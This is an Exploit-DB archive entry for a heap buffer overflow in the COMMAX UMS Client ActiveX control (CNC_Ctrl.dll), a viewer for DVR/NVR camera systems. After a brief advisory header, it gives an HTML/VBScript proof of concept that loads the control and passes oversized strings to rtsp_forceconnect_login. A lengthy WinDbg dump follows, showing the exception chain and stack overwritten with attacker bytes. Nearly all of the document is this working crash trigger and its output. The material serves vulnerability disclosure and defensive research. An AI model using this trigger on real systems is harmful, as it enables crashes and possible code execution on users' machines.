exploit-db-mirror/exploits/hardware/webapps/50232.txt

# Exploit Title: COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com

COMMAX UMS Client ActiveX Control 1.7.0.2 (CNC_Ctrl.dll) Heap Buffer Overflow


Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: 1.7.0.2

Summary: COMMAX activex web viewer UMS client (32bit) for COMMAX
DVR/NVR.

Desc: The vulnerability is caused due to a boundary error in the
processing of user input, which can be exploited to cause a heap
based buffer overflow when a user inserts overly long array of
string bytes through several functions. Successful exploitation
could allow execution of arbitrary code on the affected node.

Tested on: Microsoft Windows 10 Home (64bit) EN
           Microsoft Internet Explorer 20H2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5664
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5664.php


02.08.2021

--


<!-- functions: rtsp_forceconnect_login() and rtsp_connect_login() -->
<!-- parameters: user_id, user_pwd and rtsp_addr                   -->
<html>
<object classid='clsid:3D6F2DBA-F4E5-40A6-8725-E99BC96CC23A' id='cel' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\CNC_CTRL.dll"
prototype  = "Function rtsp_forceconnect_login ( ByVal user_id As String ,  ByVal user_pwd As String ,  ByVal rtsp_addr As String ,  ByVal rtsp_port As Long ,  ByVal rtp_proto As Long ,  ByVal device As Long ,  ByVal islive As Long ,  ByVal ch As Long ) As Long"
memberName = "rtsp_forceconnect_login"
progid     = "CNC_CTRLLib.UMS_Ctrl"
argCount   = 8

arga=String(2510, "C")
argb=String(2510, "B")
argc=String(2510, "A")
argd=1
arge=1
argf=1
argg=1
argh=1

cel.rtsp_forceconnect_login arga ,argb ,argc ,argd ,arge ,argf ,argg ,argh

</script>
</html>

==

(5b1c.59e8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for CNC_Ctrl.DLL -
CNC_Ctrl!DllUnregisterServer+0x19e34:
10028cf2 83a1d412000000  and     dword ptr [ecx+12D4h],0 ds:002b:000012d4=????????
0:000:x86> r
eax=00000001 ebx=10119db8 ecx=00000000 edx=81ff6f2e esi=058c0048 edi=00000001
eip=10028cf2 esp=030fcf10 ebp=030fe33c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
CNC_Ctrl!DllUnregisterServer+0x19e34:
10028cf2 83a1d412000000  and     dword ptr [ecx+12D4h],0 ds:002b:000012d4=????????
0:000:x86> !exchain
030feab4: 41414141
Invalid exception stack at 41414141
0:000:x86> d esp
030fcf10  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf20  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf30  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf40  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf50  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf60  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf70  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf80  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000:x86> d ebp
030fe33c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe34c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe35c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe36c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe37c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe38c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe39c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe3ac  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
0:000:x86> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

GetUrlPageData2 (WinHttp) failed: 12002.

DUMP_CLASS: 2

DUMP_QUALIFIER: 0

FAULTING_IP:
CNC_Ctrl!DllUnregisterServer+18ee3
10027da1 8999d4120000    mov     dword ptr [ecx+12D4h],ebx

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 10027da1 (CNC_Ctrl!DllUnregisterServer+0x00018ee3)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 000012d4
Attempt to write to address 000012d4

FAULTING_THREAD:  000056a4

DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE

PROCESS_NAME:  wscript.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  00000001

EXCEPTION_PARAMETER2:  000012d4

FOLLOWUP_IP:
CNC_Ctrl!DllUnregisterServer+18ee3
10027da1 8999d4120000    mov     dword ptr [ecx+12D4h],ebx

WRITE_ADDRESS:  000012d4

WATSON_BKT_PROCSTAMP:  7159f3df

WATSON_BKT_PROCVER:  5.812.10240.16384

PROCESS_VER_PRODUCT:  Microsoft ® Windows Script Host

WATSON_BKT_MODULE:  CNC_Ctrl.DLL

WATSON_BKT_MODSTAMP:  547ed821

WATSON_BKT_MODOFFSET:  27da1

WATSON_BKT_MODVER:  1.7.0.2

MODULE_VER_PRODUCT:  CNC_Ctrl Module

BUILD_VERSION_STRING:  10.0.19041.1023 (WinBuild.160101.0800)

MODLIST_WITH_TSCHKSUM_HASH:  d459299c6b0ff5b482d41c6445b84a3447c0171e

MODLIST_SHA1_HASH:  18e8e8c8cdd4f9db5369e6ca934fd1b74bcb19c1

NTGLOBALFLAG:  0

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS:  0

PRODUCT_TYPE:  1

SUITE_MASK:  784

DUMP_TYPE:  fe

ANALYSIS_SESSION_HOST:  LAB17

ANALYSIS_SESSION_TIME:  08-12-2021 13:37:16.0907

ANALYSIS_VERSION: 10.0.16299.91 amd64fre

THREAD_ATTRIBUTES:
OS_LOCALE:  ENU

PROBLEM_CLASSES:

    ID:     [0n301]
    Type:   [@ACCESS_VIOLATION]
    Class:  Addendum
    Scope:  BUCKET_ID
    Name:   Omit
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x56a4]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

    ID:     [0n274]
    Type:   [INVALID_POINTER_WRITE]
    Class:  Primary
    Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
            BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x56a4]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

    ID:     [0n152]
    Type:   [ZEROED_STACK]
    Class:  Addendum
    Scope:  BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [0x56e4]
    TID:    [0x56a4]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK

PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT

IP_ON_HEAP:  61616161
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 61616161

FRAME_ONE_INVALID: 1

LAST_CONTROL_TRANSFER:  from 61616161 to 10027da1

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
00afe294 61616161 61616161 61616161 61616161 CNC_Ctrl!DllUnregisterServer+0x18ee3
00afe298 61616161 61616161 61616161 61616161 0x61616161
00afe29c 61616161 61616161 61616161 61616161 0x61616161
00afe2a0 61616161 61616161 61616161 61616161 0x61616161
00afe2a4 61616161 61616161 61616161 61616161 0x61616161
00afe2a8 61616161 61616161 61616161 61616161 0x61616161
00afe2ac 61616161 61616161 61616161 61616161 0x61616161
00afe2b0 61616161 61616161 61616161 61616161 0x61616161
00afe2b4 61616161 61616161 61616161 61616161 0x61616161
00afe2b8 61616161 61616161 61616161 61616161 0x61616161
00afe2bc 61616161 61616161 61616161 61616161 0x61616161
00afe2c0 61616161 61616161 61616161 61616161 0x61616161
00afe2c4 61616161 61616161 61616161 61616161 0x61616161
00afe2c8 61616161 61616161 61616161 61616161 0x61616161
00afe2cc 61616161 61616161 61616161 61616161 0x61616161
00afe2d0 61616161 61616161 61616161 61616161 0x61616161
00afe2d4 61616161 61616161 61616161 61616161 0x61616161
00afe2d8 61616161 61616161 61616161 61616161 0x61616161
00afe2dc 61616161 61616161 61616161 61616161 0x61616161
00afe2e0 61616161 61616161 61616161 61616161 0x61616161
00afe2e4 61616161 61616161 61616161 61616161 0x61616161
00afe2e8 61616161 61616161 61616161 61616161 0x61616161
00afe2ec 61616161 61616161 61616161 61616161 0x61616161
00afe2f0 61616161 61616161 61616161 61616161 0x61616161
00afe2f4 61616161 61616161 61616161 61616161 0x61616161
00afe2f8 61616161 61616161 61616161 61616161 0x61616161
00afe2fc 61616161 61616161 61616161 61616161 0x61616161
00afe300 61616161 61616161 61616161 61616161 0x61616161
00afe304 61616161 61616161 61616161 61616161 0x61616161
00afe308 61616161 61616161 61616161 61616161 0x61616161
00afe30c 61616161 61616161 61616161 61616161 0x61616161
00afe310 61616161 61616161 61616161 61616161 0x61616161
00afe314 61616161 61616161 61616161 61616161 0x61616161
00afe318 61616161 61616161 61616161 41414141 0x61616161
00afe31c 61616161 61616161 41414141 41414141 0x61616161
00afe320 61616161 41414141 41414141 41414141 0x61616161
00afe324 41414141 41414141 41414141 41414141 0x61616161
00afe328 41414141 41414141 41414141 41414141 0x41414141
00afe32c 41414141 41414141 41414141 41414141 0x41414141
00afe330 41414141 41414141 41414141 41414141 0x41414141
00afe334 41414141 41414141 41414141 41414141 0x41414141
00afe338 41414141 41414141 41414141 41414141 0x41414141
00afe33c 41414141 41414141 41414141 41414141 0x41414141
00afe340 41414141 41414141 41414141 41414141 0x41414141
00afe344 41414141 41414141 41414141 41414141 0x41414141
00afe348 41414141 41414141 41414141 41414141 0x41414141
00afe34c 41414141 41414141 41414141 41414141 0x41414141
00afe350 41414141 41414141 41414141 41414141 0x41414141
00afe354 41414141 41414141 41414141 41414141 0x41414141
00afe358 41414141 41414141 41414141 41414141 0x41414141
00afe35c 41414141 41414141 41414141 41414141 0x41414141
00afe360 41414141 41414141 41414141 41414141 0x41414141
00afe364 41414141 41414141 41414141 41414141 0x41414141
00afe368 41414141 41414141 41414141 41414141 0x41414141
00afe36c 41414141 41414141 41414141 41414141 0x41414141
00afe370 41414141 41414141 41414141 41414141 0x41414141
00afe374 41414141 41414141 41414141 41414141 0x41414141
00afe378 41414141 41414141 41414141 41414141 0x41414141
00afe37c 41414141 41414141 41414141 41414141 0x41414141
00afe380 41414141 41414141 41414141 41414141 0x41414141
00afe384 41414141 41414141 41414141 41414141 0x41414141
00afe388 41414141 41414141 41414141 41414141 0x41414141
00afe38c 41414141 41414141 41414141 41414141 0x41414141
00afe390 41414141 41414141 41414141 41414141 0x41414141
00afe394 41414141 41414141 41414141 41414141 0x41414141
00afe398 41414141 41414141 41414141 41414141 0x41414141
00afe39c 41414141 41414141 41414141 41414141 0x41414141
00afe3a0 41414141 41414141 41414141 41414141 0x41414141
00afe3a4 41414141 41414141 41414141 41414141 0x41414141
00afe3a8 41414141 41414141 41414141 41414141 0x41414141
00afe3ac 41414141 41414141 41414141 41414141 0x41414141
00afe3b0 41414141 41414141 41414141 41414141 0x41414141
00afe3b4 41414141 41414141 41414141 41414141 0x41414141
00afe3b8 41414141 41414141 41414141 41414141 0x41414141
00afe3bc 41414141 41414141 41414141 41414141 0x41414141
00afe3c0 41414141 41414141 41414141 41414141 0x41414141
00afe3c4 41414141 41414141 41414141 41414141 0x41414141
00afe3c8 41414141 41414141 41414141 41414141 0x41414141
00afe3cc 41414141 41414141 41414141 41414141 0x41414141
00afe3d0 41414141 41414141 41414141 41414141 0x41414141
00afe3d4 41414141 41414141 41414141 41414141 0x41414141
00afe3d8 41414141 41414141 41414141 41414141 0x41414141
00afe3dc 41414141 41414141 41414141 41414141 0x41414141
00afe3e0 41414141 41414141 41414141 41414141 0x41414141
00afe3e4 41414141 41414141 41414141 41414141 0x41414141
00afe3e8 41414141 41414141 41414141 41414141 0x41414141
00afe3ec 41414141 41414141 41414141 41414141 0x41414141
00afe3f0 41414141 41414141 41414141 41414141 0x41414141
00afe3f4 41414141 41414141 41414141 41414141 0x41414141
00afe3f8 41414141 41414141 41414141 41414141 0x41414141
00afe3fc 41414141 41414141 41414141 41414141 0x41414141
00afe400 41414141 41414141 41414141 41414141 0x41414141
00afe404 41414141 41414141 41414141 41414141 0x41414141
00afe408 41414141 41414141 41414141 41414141 0x41414141
00afe40c 41414141 41414141 41414141 41414141 0x41414141
00afe410 41414141 41414141 41414141 41414141 0x41414141
00afe414 41414141 41414141 41414141 41414141 0x41414141
00afe418 41414141 41414141 41414141 41414141 0x41414141
00afe41c 41414141 41414141 41414141 41414141 0x41414141
00afe420 41414141 41414141 41414141 41414141 0x41414141
00afe424 41414141 41414141 41414141 41414141 0x41414141
00afe428 41414141 41414141 41414141 41414141 0x41414141
00afe42c 41414141 41414141 41414141 41414141 0x41414141
00afe430 41414141 41414141 41414141 41414141 0x41414141
00afe434 41414141 41414141 41414141 41414141 0x41414141
00afe438 41414141 41414141 41414141 41414141 0x41414141
00afe43c 41414141 41414141 41414141 41414141 0x41414141
00afe440 41414141 41414141 41414141 41414141 0x41414141
00afe444 41414141 41414141 41414141 41414141 0x41414141
00afe448 41414141 41414141 41414141 41414141 0x41414141
00afe44c 41414141 41414141 41414141 41414141 0x41414141
00afe450 41414141 41414141 41414141 41414141 0x41414141
00afe454 41414141 41414141 41414141 41414141 0x41414141
00afe458 41414141 41414141 41414141 41414141 0x41414141
00afe45c 41414141 41414141 41414141 41414141 0x41414141
00afe460 41414141 41414141 41414141 41414141 0x41414141
00afe464 41414141 41414141 41414141 41414141 0x41414141
00afe468 41414141 41414141 41414141 41414141 0x41414141
00afe46c 41414141 41414141 41414141 41414141 0x41414141
00afe470 41414141 41414141 41414141 41414141 0x41414141
00afe474 41414141 41414141 41414141 41414141 0x41414141
00afe478 41414141 41414141 41414141 41414141 0x41414141
00afe47c 41414141 41414141 41414141 41414141 0x41414141
00afe480 41414141 41414141 41414141 41414141 0x41414141
00afe484 41414141 41414141 41414141 41414141 0x41414141
00afe488 41414141 41414141 41414141 41414141 0x41414141
00afe48c 41414141 41414141 41414141 41414141 0x41414141
00afe490 41414141 41414141 41414141 41414141 0x41414141
00afe494 41414141 41414141 41414141 41414141 0x41414141
00afe498 41414141 41414141 41414141 41414141 0x41414141
00afe49c 41414141 41414141 41414141 41414141 0x41414141
00afe4a0 41414141 41414141 41414141 41414141 0x41414141
00afe4a4 41414141 41414141 41414141 41414141 0x41414141
00afe4a8 41414141 41414141 41414141 41414141 0x41414141
00afe4ac 41414141 41414141 41414141 41414141 0x41414141
00afe4b0 41414141 41414141 41414141 41414141 0x41414141
00afe4b4 41414141 41414141 41414141 41414141 0x41414141
00afe4b8 41414141 41414141 41414141 41414141 0x41414141
00afe4bc 41414141 41414141 41414141 41414141 0x41414141
00afe4c0 41414141 41414141 41414141 41414141 0x41414141
00afe4c4 41414141 41414141 41414141 41414141 0x41414141
00afe4c8 41414141 41414141 41414141 41414141 0x41414141
00afe4cc 41414141 41414141 41414141 41414141 0x41414141
00afe4d0 41414141 41414141 41414141 41414141 0x41414141
00afe4d4 41414141 41414141 41414141 41414141 0x41414141
00afe4d8 41414141 41414141 41414141 41414141 0x41414141
00afe4dc 41414141 41414141 41414141 41414141 0x41414141
00afe4e0 41414141 41414141 41414141 41414141 0x41414141
00afe4e4 41414141 41414141 41414141 41414141 0x41414141
00afe4e8 41414141 41414141 41414141 41414141 0x41414141
00afe4ec 41414141 41414141 41414141 41414141 0x41414141
00afe4f0 41414141 41414141 41414141 41414141 0x41414141
00afe4f4 41414141 41414141 41414141 41414141 0x41414141
00afe4f8 41414141 41414141 41414141 41414141 0x41414141
00afe4fc 41414141 41414141 41414141 41414141 0x41414141
00afe500 41414141 41414141 41414141 41414141 0x41414141
00afe504 41414141 41414141 41414141 41414141 0x41414141
00afe508 41414141 41414141 41414141 41414141 0x41414141
00afe50c 41414141 41414141 41414141 41414141 0x41414141
00afe510 41414141 41414141 41414141 41414141 0x41414141
00afe514 41414141 41414141 41414141 41414141 0x41414141
00afe518 41414141 41414141 41414141 41414141 0x41414141
00afe51c 41414141 41414141 41414141 41414141 0x41414141
00afe520 41414141 41414141 41414141 41414141 0x41414141
00afe524 41414141 41414141 41414141 41414141 0x41414141
00afe528 41414141 41414141 41414141 41414141 0x41414141
00afe52c 41414141 41414141 41414141 41414141 0x41414141
00afe530 41414141 41414141 41414141 41414141 0x41414141
00afe534 41414141 41414141 41414141 41414141 0x41414141
00afe538 41414141 41414141 41414141 41414141 0x41414141
00afe53c 41414141 41414141 41414141 41414141 0x41414141
00afe540 41414141 41414141 41414141 41414141 0x41414141
00afe544 41414141 41414141 41414141 41414141 0x41414141
00afe548 41414141 41414141 41414141 41414141 0x41414141
00afe54c 41414141 41414141 41414141 41414141 0x41414141
00afe550 41414141 41414141 41414141 41414141 0x41414141
00afe554 41414141 41414141 41414141 41414141 0x41414141
00afe558 41414141 41414141 41414141 41414141 0x41414141
00afe55c 41414141 41414141 41414141 41414141 0x41414141
00afe560 41414141 41414141 41414141 41414141 0x41414141
00afe564 41414141 41414141 41414141 41414141 0x41414141
00afe568 41414141 41414141 41414141 41414141 0x41414141
00afe56c 41414141 41414141 41414141 41414141 0x41414141
00afe570 41414141 41414141 41414141 41414141 0x41414141
00afe574 41414141 41414141 41414141 41414141 0x41414141
00afe578 41414141 41414141 41414141 41414141 0x41414141
00afe57c 41414141 41414141 41414141 41414141 0x41414141
00afe580 41414141 41414141 41414141 41414141 0x41414141
00afe584 41414141 41414141 41414141 41414141 0x41414141
00afe588 41414141 41414141 41414141 41414141 0x41414141
00afe58c 41414141 41414141 41414141 41414141 0x41414141
00afe590 41414141 41414141 41414141 41414141 0x41414141
00afe594 41414141 41414141 41414141 41414141 0x41414141
00afe598 41414141 41414141 41414141 41414141 0x41414141
00afe59c 41414141 41414141 41414141 41414141 0x41414141
00afe5a0 41414141 41414141 41414141 41414141 0x41414141
00afe5a4 41414141 41414141 41414141 41414141 0x41414141
00afe5a8 41414141 41414141 41414141 41414141 0x41414141
00afe5ac 41414141 41414141 41414141 41414141 0x41414141
00afe5b0 41414141 41414141 41414141 41414141 0x41414141
00afe5b4 41414141 41414141 41414141 41414141 0x41414141
00afe5b8 41414141 41414141 41414141 41414141 0x41414141
00afe5bc 41414141 41414141 41414141 41414141 0x41414141
00afe5c0 41414141 41414141 41414141 41414141 0x41414141
00afe5c4 41414141 41414141 41414141 41414141 0x41414141
00afe5c8 41414141 41414141 41414141 41414141 0x41414141
00afe5cc 41414141 41414141 41414141 41414141 0x41414141
00afe5d0 41414141 41414141 41414141 41414141 0x41414141
00afe5d4 41414141 41414141 41414141 41414141 0x41414141
00afe5d8 41414141 41414141 41414141 41414141 0x41414141
00afe5dc 41414141 41414141 41414141 41414141 0x41414141
00afe5e0 41414141 41414141 41414141 41414141 0x41414141
00afe5e4 41414141 41414141 41414141 41414141 0x41414141
00afe5e8 41414141 41414141 41414141 41414141 0x41414141
00afe5ec 41414141 41414141 41414141 41414141 0x41414141
00afe5f0 41414141 41414141 41414141 41414141 0x41414141
00afe5f4 41414141 41414141 41414141 41414141 0x41414141

STACK_COMMAND:  ~0s ; .cxr ; kb

THREAD_SHA1_HASH_MOD_FUNC:  1ff3866701b0a93c59477aaf393ad9182c6cbb4f

THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  31358b3bd1a2fecfa57be49dd21574669d1b1ea2

THREAD_SHA1_HASH_MOD:  2219bd78d12868af57c664db206871e4461019b1

FAULT_INSTR_CODE:  12d49989

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  CNC_Ctrl!DllUnregisterServer+18ee3

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: CNC_Ctrl

IMAGE_NAME:  CNC_Ctrl.DLL

DEBUG_FLR_IMAGE_TIMESTAMP:  547ed821

FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer

BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+18ee3

FAILURE_EXCEPTION_CODE:  c0000005

FAILURE_IMAGE_NAME:  CNC_Ctrl.DLL

BUCKET_ID_IMAGE_STR:  CNC_Ctrl.DLL

FAILURE_MODULE_NAME:  CNC_Ctrl

BUCKET_ID_MODULE_STR:  CNC_Ctrl

FAILURE_FUNCTION_NAME:  DllUnregisterServer

BUCKET_ID_FUNCTION_STR:  DllUnregisterServer

BUCKET_ID_OFFSET:  18ee3

BUCKET_ID_MODTIMEDATESTAMP:  547ed821

BUCKET_ID_MODCHECKSUM:  357a4b

BUCKET_ID_MODVER_STR:  1.7.0.2

BUCKET_ID_PREFIX_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_

FAILURE_PROBLEM_CLASS:  APPLICATION_FAULT

FAILURE_SYMBOL_NAME:  CNC_Ctrl.DLL!DllUnregisterServer

WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/wscript.exe/5.812.10240.16384/7159f3df/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/00027da1.htm?Retriage=1

TARGET_TIME:  2021-08-12T11:37:22.000Z

OSBUILD:  19042

OSSERVICEPACK:  1023

SERVICEPACK_NUMBER: 0

OS_REVISION: 0

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

OSEDITION:  Windows 10 WinNt SingleUserTS Personal

USER_LCID:  0

OSBUILD_TIMESTAMP:  unknown_date

BUILDDATESTAMP_STR:  160101.0800

BUILDLAB_STR:  WinBuild

BUILDOSVER_STR:  10.0.19041.1023

ANALYSIS_SESSION_ELAPSED_TIME:  68b2

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver

FAILURE_ID_HASH:  {5e1e375a-c411-e928-cd64-b7f6c07eea3b}

Followup:     MachineOwner
---------